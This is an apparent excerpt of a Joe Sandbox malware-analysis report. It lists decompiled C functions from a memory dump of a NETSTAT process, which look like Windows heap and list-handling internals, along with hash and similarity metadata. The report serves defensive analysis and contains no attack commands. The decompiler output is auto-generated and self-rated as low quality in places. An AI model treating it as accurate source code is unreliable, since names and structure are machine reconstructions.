                • Instruction Fuzzy Hash: FC215936440A40DFC721EF28CA80F6AB7F9FF18704F1545A8E0499A6A2DB39E942DB44
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 90%
                			E033E4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
                				intOrPtr* _t18;
                				intOrPtr _t24;
                				intOrPtr* _t27;
                				intOrPtr* _t30;
                				intOrPtr* _t31;
                				intOrPtr _t33;
                				intOrPtr* _t34;
                				intOrPtr* _t35;
                				void* _t37;
                				void* _t38;
                				void* _t39;
                				void* _t43;
                
                				_t39 = __eflags;
                				_t35 = __edi;
                				_push(8);
                				_push(0x34308d0);
                				E033AD08C(__ebx, __edi, __esi);
                				_t37 = __ecx;
                				E033E41E8(__ebx, __edi, __ecx, _t39);
                				E0336EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
                				_t18 = _t37 + 8;
                				_t33 =  *_t18;
                				_t27 =  *((intOrPtr*)(_t18 + 4));
                				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
                					L8:
                					_push(3);
                					asm("int 0x29");
                				} else {
                					 *_t27 = _t33;
                					 *((intOrPtr*)(_t33 + 4)) = _t27;
                					_t35 = 0x34487e4;
                					_t18 =  *0x34487e0; // 0x0
                					while(_t18 != 0) {
                						_t43 = _t18 -  *0x3445cd0; // 0xffffffff
                						if(_t43 >= 0) {
                							_t31 =  *0x34487e4; // 0x0
                							_t18 =  *_t31;
                							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
                								goto L8;
                							} else {
                								 *0x34487e4 = _t18;
                								 *((intOrPtr*)(_t18 + 4)) = _t35;
                								L03357055(_t31 + 0xfffffff8);
                								_t24 =  *0x34487e0; // 0x0
                								_t18 = _t24 - 1;
                								 *0x34487e0 = _t18;
                								continue;
                							}
                						}
                						goto L9;
                					}
                				}
                				L9:
                				__eflags =  *0x3445cd0;
                				if( *0x3445cd0 <= 0) {
                					L03357055(_t37);
                				} else {
                					_t30 = _t37 + 8;
                					_t34 =  *0x34487e8; // 0x0
                					__eflags =  *_t34 - _t35;
                					if( *_t34 != _t35) {
                						goto L8;
                					} else {
                						 *_t30 = _t35;
                						 *((intOrPtr*)(_t30 + 4)) = _t34;
                						 *_t34 = _t30;
                						 *0x34487e8 = _t30;
                						 *0x34487e0 = _t18 + 1;
                					}
                				}
                				 *(_t38 - 4) = 0xfffffffe;
                				return E033AD0D1(L033E4320());
                			}
















                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3d7bb39ecba68eb14b14ccfcb5da3e64cdf9cd7804521d9b2706951db6c84225
                • Instruction ID: 9a85ae6909d274551bbcbbb997c674421d0ad43236b18eab6de7a51495f0e799
                • Opcode Fuzzy Hash: 3d7bb39ecba68eb14b14ccfcb5da3e64cdf9cd7804521d9b2706951db6c84225
                • Instruction Fuzzy Hash: DF219D78900720CFDB14EF2ADA90A24B7F5FB89354B6482BEC1159F6D8DB36D481CB00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 29%
                			E03382397(intOrPtr _a4) {
                				void* __ebx;
                				void* __ecx;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				signed int _t11;
                				void* _t19;
                				void* _t25;
                				void* _t26;
                				intOrPtr _t27;
                				void* _t28;
                				void* _t29;
                
                				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
                				if( *0x344848c != 0) {
                					L0337FAD0(0x3448610);
                					if( *0x344848c == 0) {
                						E0337FA00(0x3448610, _t19, _t27, 0x3448610);
                						goto L1;
                					} else {
                						_push(0);
                						_push(_a4);
                						_t26 = 4;
                						_t29 = E03382581(0x3448610, 0x33350a0, _t26, _t27, _t28);
                						E0337FA00(0x3448610, 0x33350a0, _t27, 0x3448610);
                					}
                				} else {
                					L1:
                					_t11 =  *0x3448614; // 0x1
                					if(_t11 == 0) {
                						_t11 = E03394886(0x3331088, 1, 0x3448614);
                					}
                					_push(0);
                					_push(_a4);
                					_t25 = 4;
                					_t29 = E03382581(0x3448610, (_t11 << 4) + 0x3335070, _t25, _t27, _t28);
                				}
                				if(_t29 != 0) {
                					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
                					 *((char*)(_t29 + 0x40)) = 0;
                				}
                				return _t29;
                			}
















                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a9767468ae6d618bcda0353cc67564469101b94355458de1e7ff56f714aaf715
                • Instruction ID: 849d8c4c03936ba104c4d3ff53d94c3168b9e6e962eb4866b4e3e8e160dd04d8
                • Opcode Fuzzy Hash: a9767468ae6d618bcda0353cc67564469101b94355458de1e7ff56f714aaf715
                • Instruction Fuzzy Hash: 7F112679B443486BE770FB2AACD0B17B2CCAB50611F188836FA02EF290D7F5E8458754
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 93%
                			E033D46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
                				signed short* _v8;
                				unsigned int _v12;
                				intOrPtr _v16;
                				signed int _t22;
                				signed char _t23;
                				short _t32;
                				void* _t38;
                				char* _t40;
                
                				_v12 = __edx;
                				_t29 = 0;
                				_v8 = __ecx;
                				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
                				_t38 = L03374620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
                				if(_t38 != 0) {
                					_t40 = _a4;
                					 *_t40 = 1;
                					E0339F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
                					_t22 = _v12 >> 1;
                					_t32 = 0x2e;
                					 *((short*)(_t38 + _t22 * 2)) = _t32;
                					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
                					_t23 = E0338D268(_t38, 1);
                					asm("sbb al, al");
                					 *_t40 =  ~_t23 + 1;
                					L033777F0(_v16, 0, _t38);
                				} else {
                					 *_a4 = 0;
                					_t29 = 0xc0000017;
                				}
                				return _t29;
                			}

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                • Instruction ID: 554213503875bc15cf3cebd75e91ff9c22b1b3300aa5b90bd026736c8624b3da
                • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                • Instruction Fuzzy Hash: DC110276904208BBCB11DF5DE8C08BEB7B9EF85300F1080AAF944CB350DA358D51C3A4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 87%
                			E033937F5(void* __ecx, intOrPtr* __edx) {
                				void* __ebx;
                				void* __edi;
                				signed char _t6;
                				intOrPtr _t13;
                				intOrPtr* _t20;
                				intOrPtr* _t27;
                				void* _t28;
                				intOrPtr* _t29;
                
                				_t27 = __edx;
                				_t28 = __ecx;
                				if(__edx == 0) {
                					E03372280(_t6, 0x3448550);
                				}
                				_t29 = E0339387E(_t28);
                				if(_t29 == 0) {
                					L6:
                					if(_t27 == 0) {
                						E0336FFB0(0x3448550, _t27, 0x3448550);
                					}
                					if(_t29 == 0) {
                						return 0xc0000225;
                					} else {
                						if(_t27 != 0) {
                							goto L14;
                						}
                						L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
                						goto L11;
                					}
                				} else {
                					_t13 =  *_t29;
                					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
                						L13:
                						_push(3);
                						asm("int 0x29");
                						L14:
                						 *_t27 = _t29;
                						L11:
                						return 0;
                					}
                					_t20 =  *((intOrPtr*)(_t29 + 4));
                					if( *_t20 != _t29) {
                						goto L13;
                					}
                					 *_t20 = _t13;
                					 *((intOrPtr*)(_t13 + 4)) = _t20;
                					asm("btr eax, ecx");
                					goto L6;
                				}
                			}

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3485130a8442d8db4ed0804640eeceb635685eda0b00e93e819394e07699e962
                • Instruction ID: 522796d2e2e6d69c2ad7a257c44cd6b6dfdd9f8bcf900a21223d405d7cb2d87d
                • Opcode Fuzzy Hash: 3485130a8442d8db4ed0804640eeceb635685eda0b00e93e819394e07699e962
                • Instruction Fuzzy Hash: 3501C4FA949620DBDB37DB1D9980A26BBEADF85A7271940EBE8458F614D730C805C780
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 42%
                			E0335C962(char __ecx) {
                				signed int _v8;
                				intOrPtr _v12;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* _t19;
                				char _t22;
                				void* _t26;
                				void* _t27;
                				char _t32;
                				char _t34;
                				void* _t35;
                				void* _t37;
                				intOrPtr* _t38;
                				signed int _t39;
                
                				_t41 = (_t39 & 0xfffffff8) - 0xc;
                				_v8 =  *0x344d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
                				_t34 = __ecx;
                				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
                					_t26 = 0;
                					E0336EEF0(0x34470a0);
                					_t29 =  *((intOrPtr*)(_t34 + 0x18));
                					if(E033DF625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
                						L9:
                						E0336EB70(_t29, 0x34470a0);
                						_t19 = _t26;
                						L2:
                						_pop(_t35);
                						_pop(_t37);
                						_pop(_t27);
                						return E0339B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
                					}
                					_t29 = _t34;
                					_t26 = E033DF1FC(_t34, _t32);
                					if(_t26 < 0) {
                						goto L9;
                					}
                					_t38 =  *0x34470c0; // 0x0
                					while(_t38 != 0x34470c0) {
                						_t22 =  *((intOrPtr*)(_t38 + 0x18));
                						_t38 =  *_t38;
                						_v12 = _t22;
                						if(_t22 != 0) {
                							_t29 = _t22;
                							 *0x344b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
                							_v12();
                						}
                					}
                					goto L9;
                				}
                				_t19 = 0;
                				goto L2;
                			}

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 99a764450b60f53d8623eb05636312bc6916c45668c95dd00ded87178093d7ac
                • Instruction ID: 8d8d9f4f872977e2b59bb84e218e5d2275fafe63aeb3d7d288fe19e5b9db1ffb
                • Opcode Fuzzy Hash: 99a764450b60f53d8623eb05636312bc6916c45668c95dd00ded87178093d7ac
                • Instruction Fuzzy Hash: 36110E367207429FCB10EF28DCC4A2ABBE9BB84610B00453DEC529BA51EB20EC01CBC1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0338002D() {
                				void* _t11;
                				char* _t14;
                				signed char* _t16;
                				char* _t27;
                				signed char* _t29;
                
                				_t11 = E03377D50();
                				_t27 = 0x7ffe0384;
                				if(_t11 != 0) {
                					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                				} else {
                					_t14 = 0x7ffe0384;
                				}
                				_t29 = 0x7ffe0385;
                				if( *_t14 != 0) {
                					if(E03377D50() == 0) {
                						_t16 = 0x7ffe0385;
                					} else {
                						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                					}
                					if(( *_t16 & 0x00000040) != 0) {
                						goto L18;
                					} else {
                						goto L3;
                					}
                				} else {
                					L3:
                					if(E03377D50() != 0) {
                						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                					}
                					if( *_t27 != 0) {
                						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
                							goto L5;
                						}
                						if(E03377D50() != 0) {
                							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                						}
                						if(( *_t29 & 0x00000020) == 0) {
                							goto L5;
                						}
                						L18:
                						return 1;
                					} else {
                						L5:
                						return 0;
                					}
                				}
                			}

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                • Instruction ID: e527af2e9f7199979ca0316990c62b31db6fcef4cf3e4fa1290b31f89917e904
                • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                • Instruction Fuzzy Hash: 6811CBB2A127C19FD727EB6AC9E4B357798AB40794F0D00E4DD548BAA2E72CDC41C360
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 94%
                			E0336766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                				char _v8;
                				void* _t22;
                				void* _t24;
                				intOrPtr _t29;
                				intOrPtr* _t30;
                				void* _t42;
                				intOrPtr _t47;
                
                				_push(__ecx);
                				_t36 =  &_v8;
                				if(E0338F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
                					L10:
                					_t22 = 0;
                				} else {
                					_t24 = _v8 + __ecx;
                					_t42 = _t24;
                					if(_t24 < __ecx) {
                						goto L10;
                					} else {
                						if(E0338F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
                							goto L10;
                						} else {
                							_t29 = _v8 + _t42;
                							if(_t29 < _t42) {
                								goto L10;
                							} else {
                								_t47 = _t29;
                								_t30 = _a16;
                								if(_t30 != 0) {
                									 *_t30 = _t47;
                								}
                								if(_t47 == 0) {
                									goto L10;
                								} else {
                									_t22 = L03374620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
                								}
                							}
                						}
                					}
                				}
                				return _t22;
                			}

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                • Instruction ID: 77e7da474bda6d2311f456756d9735221af500322f79c1b821202fdce90f4d76
                • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                • Instruction Fuzzy Hash: C901D432711218AFC720EE6ECCC0E5BF7ADEB84A60B684124B908DF248DA30DC0183A0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 46%
                			E033EC450(intOrPtr* _a4) {
                				signed char _t25;
                				intOrPtr* _t26;
                				intOrPtr* _t27;
                
                				_t26 = _a4;
                				_t25 =  *(_t26 + 0x10);
                				if((_t25 & 0x00000003) != 1) {
                					_push(0);
                					_push(0);
                					_push(0);
                					_push( *((intOrPtr*)(_t26 + 8)));
                					_push(0);
                					_push( *_t26);
                					E03399910();
                					_t25 =  *(_t26 + 0x10);
                				}
                				if((_t25 & 0x00000001) != 0) {
                					_push(4);
                					_t7 = _t26 + 4; // 0x4
                					_t27 = _t7;
                					_push(_t27);
                					_push(5);
                					_push(0xfffffffe);
                					E033995B0();
                					if( *_t27 != 0) {
                						_push( *_t27);
                						E033995D0();
                					}
                				}
                				_t8 = _t26 + 0x14; // 0x14
                				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
                					L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
                				}
                				_push( *_t26);
                				E033995D0();
                				return L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
                			}

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                • Instruction ID: c1ffa3a646369b9933831f69658f203cbd3b001a4749019abf9a357d7a6ee3f2
                • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                • Instruction Fuzzy Hash: 3D018076140615FFEB22EF65CCC0EA7F76DFB54391F044529F114465A0CB21ACA1CAA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 69%
                			E03359080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                				intOrPtr* _t51;
                				intOrPtr _t59;
                				signed int _t64;
                				signed int _t67;
                				signed int* _t71;
                				signed int _t74;
                				signed int _t77;
                				signed int _t82;
                				intOrPtr* _t84;
                				void* _t85;
                				intOrPtr* _t87;
                				void* _t94;
                				signed int _t95;
                				intOrPtr* _t97;
                				signed int _t99;
                				signed int _t102;
                				void* _t104;
                
                				_push(__ebx);
                				_push(__esi);
                				_push(__edi);
                				_t97 = __ecx;
                				_t102 =  *(__ecx + 0x14);
                				if((_t102 & 0x02ffffff) == 0x2000000) {
                					_t102 = _t102 | 0x000007d0;
                				}
                				_t48 =  *[fs:0x30];
                				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                					_t102 = _t102 & 0xff000000;
                				}
                				_t80 = 0x34485ec;
                				E03372280(_t48, 0x34485ec);
                				_t51 =  *_t97 + 8;
                				if( *_t51 != 0) {
                					L6:
                					return E0336FFB0(_t80, _t97, _t80);
                				} else {
                					 *(_t97 + 0x14) = _t102;
                					_t84 =  *0x344538c; // 0x77e06888
                					if( *_t84 != 0x3445388) {
                						_t85 = 3;
                						asm("int 0x29");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						_push(0x2c);
                						_push(0x342f6e8);
                						E033AD0E8(0x34485ec, _t97, _t102);
                						 *((char*)(_t104 - 0x1d)) = 0;
                						_t99 =  *(_t104 + 8);
                						__eflags = _t99;
                						if(_t99 == 0) {
                							L13:
                							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                							if(__eflags == 0) {
                								E034288F5(_t80, _t85, 0x3445388, _t99, _t102, __eflags);
                							}
                						} else {
                							__eflags = _t99 -  *0x34486c0; // 0xb307b0
                							if(__eflags == 0) {
                								goto L13;
                							} else {
                								__eflags = _t99 -  *0x34486b8; // 0x0
                								if(__eflags == 0) {
                									goto L13;
                								} else {
                									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                									__eflags =  *((char*)(_t59 + 0x28));
                									if( *((char*)(_t59 + 0x28)) == 0) {
                										E03372280(_t99 + 0xe0, _t99 + 0xe0);
                										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
                										__eflags =  *((char*)(_t99 + 0xe5));
                										if(__eflags != 0) {
                											E034288F5(0x34485ec, _t85, 0x3445388, _t99, _t102, __eflags);
                										} else {
                											__eflags =  *((char*)(_t99 + 0xe4));
                											if( *((char*)(_t99 + 0xe4)) == 0) {
                												 *((char*)(_t99 + 0xe4)) = 1;
                												_push(_t99);
                												_push( *((intOrPtr*)(_t99 + 0x24)));
                												E0339AFD0();
                											}
                											while(1) {
                												_t71 = _t99 + 8;
                												 *(_t104 - 0x2c) = _t71;
                												_t80 =  *_t71;
                												_t95 = _t71[1];
                												 *(_t104 - 0x28) = _t80;
                												 *(_t104 - 0x24) = _t95;
                												while(1) {
                													L19:
                													__eflags = _t95;
                													if(_t95 == 0) {
                														break;
                													}
                													_t102 = _t80;
                													 *(_t104 - 0x30) = _t95;
                													 *(_t104 - 0x24) = _t95 - 1;
                													asm("lock cmpxchg8b [edi]");
                													_t80 = _t102;
                													 *(_t104 - 0x28) = _t80;
                													 *(_t104 - 0x24) = _t95;
                													__eflags = _t80 - _t102;
                													_t99 =  *(_t104 + 8);
                													if(_t80 != _t102) {
                														continue;
                													} else {
                														__eflags = _t95 -  *(_t104 - 0x30);
                														if(_t95 !=  *(_t104 - 0x30)) {
                															continue;
                														} else {
                															__eflags = _t95;
                															if(_t95 != 0) {
                																_t74 = 0;
                																 *(_t104 - 0x34) = 0;
                																_t102 = 0;
                																__eflags = 0;
                																while(1) {
                																	 *(_t104 - 0x3c) = _t102;
                																	__eflags = _t102 - 3;
                																	if(_t102 >= 3) {
                																		break;
                																	}
                																	__eflags = _t74;
                																	if(_t74 != 0) {
                																		L49:
                																		_t102 =  *_t74;
                																		__eflags = _t102;
                																		if(_t102 != 0) {
                																			_t102 =  *(_t102 + 4);
                																			__eflags = _t102;
                																			if(_t102 != 0) {
                																				 *0x344b1e0(_t74, _t99);
                																				 *_t102();
                																			}
                																		}
                																		do {
                																			_t71 = _t99 + 8;
                																			 *(_t104 - 0x2c) = _t71;
                																			_t80 =  *_t71;
                																			_t95 = _t71[1];
                																			 *(_t104 - 0x28) = _t80;
                																			 *(_t104 - 0x24) = _t95;
                																			goto L19;
                																		} while (_t74 == 0);
                																		goto L49;
                																	} else {
                																		_t82 = 0;
                																		__eflags = 0;
                																		while(1) {
                																			 *(_t104 - 0x38) = _t82;
                																			__eflags = _t82 -  *0x34484c0;
                																			if(_t82 >=  *0x34484c0) {
                																				break;
                																			}
                																			__eflags = _t74;
                																			if(_t74 == 0) {
                																				_t77 = E03429063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
                																				__eflags = _t77;
                																				if(_t77 == 0) {
                																					_t74 = 0;
                																					__eflags = 0;
                																				} else {
                																					_t74 = _t77 + 0xfffffff4;
                																				}
                																				 *(_t104 - 0x34) = _t74;
                																				_t82 = _t82 + 1;
                																				continue;
                																			}
                																			break;
                																		}
                																		_t102 = _t102 + 1;
                																		continue;
                																	}
                																	goto L20;
                																}
                																__eflags = _t74;
                															}
                														}
                													}
                													break;
                												}
                												L20:
                												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
                												 *((char*)(_t99 + 0xe5)) = 1;
                												 *((char*)(_t104 - 0x1d)) = 1;
                												goto L21;
                											}
                										}
                										L21:
                										 *(_t104 - 4) = 0xfffffffe;
                										E0335922A(_t99);
                										_t64 = E03377D50();
                										__eflags = _t64;
                										if(_t64 != 0) {
                											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                										} else {
                											_t67 = 0x7ffe0386;
                										}
                										__eflags =  *_t67;
                										if( *_t67 != 0) {
                											_t67 = E03428B58(_t99);
                										}
                										__eflags =  *((char*)(_t104 - 0x1d));
                										if( *((char*)(_t104 - 0x1d)) != 0) {
                											__eflags = _t99 -  *0x34486c0; // 0xb307b0
                											if(__eflags != 0) {
                												__eflags = _t99 -  *0x34486b8; // 0x0
                												if(__eflags == 0) {
                													_t94 = 0x34486bc;
                													_t87 = 0x34486b8;
                													goto L27;
                												} else {
                													__eflags = _t67 | 0xffffffff;
                													asm("lock xadd [edi], eax");
                													if(__eflags == 0) {
                														E03359240(_t80, _t99, _t99, _t102, __eflags);
                													}
                												}
                											} else {
                												_t94 = 0x34486c4;
                												_t87 = 0x34486c0;
                												L27:
                												E03389B82(_t80, _t87, _t94, _t99, _t102, __eflags);
                											}
                										}
                									} else {
                										goto L13;
                									}
                								}
                							}
                						}
                						return E033AD130(_t80, _t99, _t102);
                					} else {
                						 *_t51 = 0x3445388;
                						 *((intOrPtr*)(_t51 + 4)) = _t84;
                						 *_t84 = _t51;
                						 *0x344538c = _t51;
                						goto L6;
                					}
                				}
                			}





















                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 397fb841f9dad6bce8ae8a134b0215e80c93b47f69545664524b2237d06240cb
                • Instruction ID: 891ed9a4f1073fac2d9676423caaf699a4135b6edf841e79b14c755b148f4394
                • Opcode Fuzzy Hash: 397fb841f9dad6bce8ae8a134b0215e80c93b47f69545664524b2237d06240cb
                • Instruction Fuzzy Hash: 350169B2A01604CFD725DB18DC80B22BBF9EB86721F2944A6E905DF691D379DC41CB90
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 86%
                			E03424015(signed int __eax, signed int __ecx) {
                				void* __ebx;
                				void* __edi;
                				signed char _t10;
                				signed int _t28;
                
                				_push(__ecx);
                				_t28 = __ecx;
                				asm("lock xadd [edi+0x24], eax");
                				_t10 = (__eax | 0xffffffff) - 1;
                				if(_t10 == 0) {
                					_t1 = _t28 + 0x1c; // 0x1e
                					E03372280(_t10, _t1);
                					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                					E03372280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x34486ac);
                					E0335F900(0x34486d4, _t28);
                					E0336FFB0(0x34486ac, _t28, 0x34486ac);
                					 *((intOrPtr*)(_t28 + 0x20)) = 0;
                					E0336FFB0(0, _t28, _t1);
                					_t18 =  *((intOrPtr*)(_t28 + 0x94));
                					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
                						L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                					}
                					_t10 = L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                				}
                				return _t10;
                			}








                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ff922297e85717c392dedbca15e3566033849e39b95af9b92ae74bf83ee27c67
                • Instruction ID: 4907d87c3a096ac93474587315f16ceff1fd32d63870ca7ef0cc5b1ed998bf70
                • Opcode Fuzzy Hash: ff922297e85717c392dedbca15e3566033849e39b95af9b92ae74bf83ee27c67
                • Instruction Fuzzy Hash: E001A775601A49BFD261EB79CDC0E67B7ACFF45660B000226F508CFA11DB24EC52C6E4
                Uniqueness

                Uniqueness Score: -1.00%

